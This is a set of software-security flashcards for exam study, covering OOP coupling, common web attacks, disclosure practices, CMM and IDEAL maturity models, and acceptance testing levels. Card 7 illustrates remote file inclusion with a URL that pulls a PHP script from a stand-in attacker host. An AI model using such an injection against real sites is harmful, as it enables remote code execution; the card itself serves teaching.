Domain 8: Software Security Flashcards

1
Q
  • OOP Term
  • Used to describe the level of an object’s dependence on other objects

A

Coupling

2
Q
  • OOP Term
  • Used to describe the level of an object’s independence from other objects

A

Cohesion

3
Q
  • OOP Terms
  • Object that greatly depends on another object

A

High Coupling and Low Cohesion

4
Q
  • OOP Terms
  • Object that is mostly independent from other objects

A

High Cohesion and Low Coupling

5
Q
  • Used to locate objects; act as search engines
  • Connect programs to programs
  • e.g. COM, DCOM, CORBA
A

Object Request Brokers (ORBs)

6
Q

Escaping from the root of the web server (e.g. /var/www) into the regular file system by referencing directories such as “../”

A

Directory Path Traversal

7
Q

Altering normal PHP URLs and variables to include and execute remote content
e.g. http://good.example.com?file=http://evil.example.com/bad.php

A

Remote File Inclusion (RFI)

8
Q

Attacker attempts to alter a condition after it has been checked by the OS, but before it is used

A

Time of check/Time of use (TOC/TOU) attacks aka Race conditions

9
Q

Leverages third-party execution of scripting languages within the security context of a trusted site

A

Cross-site scripting (XSS)

10
Q

Leverages a third-party redirect of static content within the security context of a trusted site

A

Cross-site request forgery (CSRF)

11
Q

Describes actions taken by the security researcher after discovering a software vulnerability

A

Disclosure

12
Q

Practice of releasing vulnerability details publicly

A

Full disclosure

13
Q

Practice of privately sharing vulnerability info with a vendor and withholding public release until a patch is available

A

Responsible disclosure

14
Q
  • Framework intended to help software organizations improve the maturity and quality of their software processes
  • Categorizes 5 stages that an organization’s software processes go through to reach maturity
  • Maturity framework for evaluating and improving the software development process
A

Software Capability Maturity Model (CMM)

15
Q

Name the 5 stages of the Software Capability Maturity Model (CMM)

A
  1. Initial
  2. Repeatable
  3. Defined
  4. Managed
  5. Optimizing
16
Q
  • Software Capability Maturity Model (CMM) stage
  • Little to no software processes are defined

A

Initial

17
Q
  • Software Capability Maturity Model (CMM) stage
  • Basic project management processes are established to track cost, schedule, and functionality.
  • Code is reused in similar projects to duplicate results
A

Repeatable

18
Q
  • Software Capability Maturity Model (CMM) stage
  • The software process for both management and engineering activities is documented, standardized, and integrated into standard software process for the organization
A

Defined

19
Q
  • Software Capability Maturity Model (CMM) stage
  • Detailed quantitative measures of the software process and product quality are collected, analyzed, and used to control the process.
A

Managed

20
Q
  • Software Capability Maturity Model (CMM) stage
  • Continual process improvement is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies.
A

Optimizing

21
Q
  • Examines whether software meets various end-state requirements
  • e.g. from a user or customer, a contract, or compliance
A

Acceptance Testing

22
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Focuses on validating the fitness-for-use of the system by the business user
A

User Acceptance Test

23
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Validates whether the system meets the requirements for operation
A

Operational Acceptance test

24
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Performed against contract’s acceptance criteria for producing custom-developed software
A

Contract Acceptance testing

25
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Performed against the regulations that must be followed, e.g. government, safety, etc.
A

Compliance Acceptance testing

26
Q

Alternative to the Software Capability Maturity Model for software development processes

A

IDEAL Model

27
Q

List the 5 stages of the IDEAL Model

A
  1. Initiating
  2. Diagnosing
  3. Establishing
  4. Acting
  5. Learning
28
Q
  • IDEAL Model Stage
  • Business reasons behind the change are outlined, support is built for the initiative, and the appropriate infrastructure is put in place
A

Initiating

29
Q
  • IDEAL Model Stage
  • Engineers analyze the current state of the organization and make general recommendations for change

A

Diagnosing

30
Q
  • IDEAL Model Stage
  • Organization takes the general recommendations from the diagnosing phase and develops a specific plan of action that helps achieve those changes
A

Establishing

31
Q
  • IDEAL Model Stage
  • Organization develops solutions and then tests, refines, and implements them

A

Acting

32
Q
  • IDEAL Model Stage
  • Organization must continuously analyze its efforts to determine whether it has achieved the desired goals and, when necessary, propose new actions to put the organization back on course
A

Learning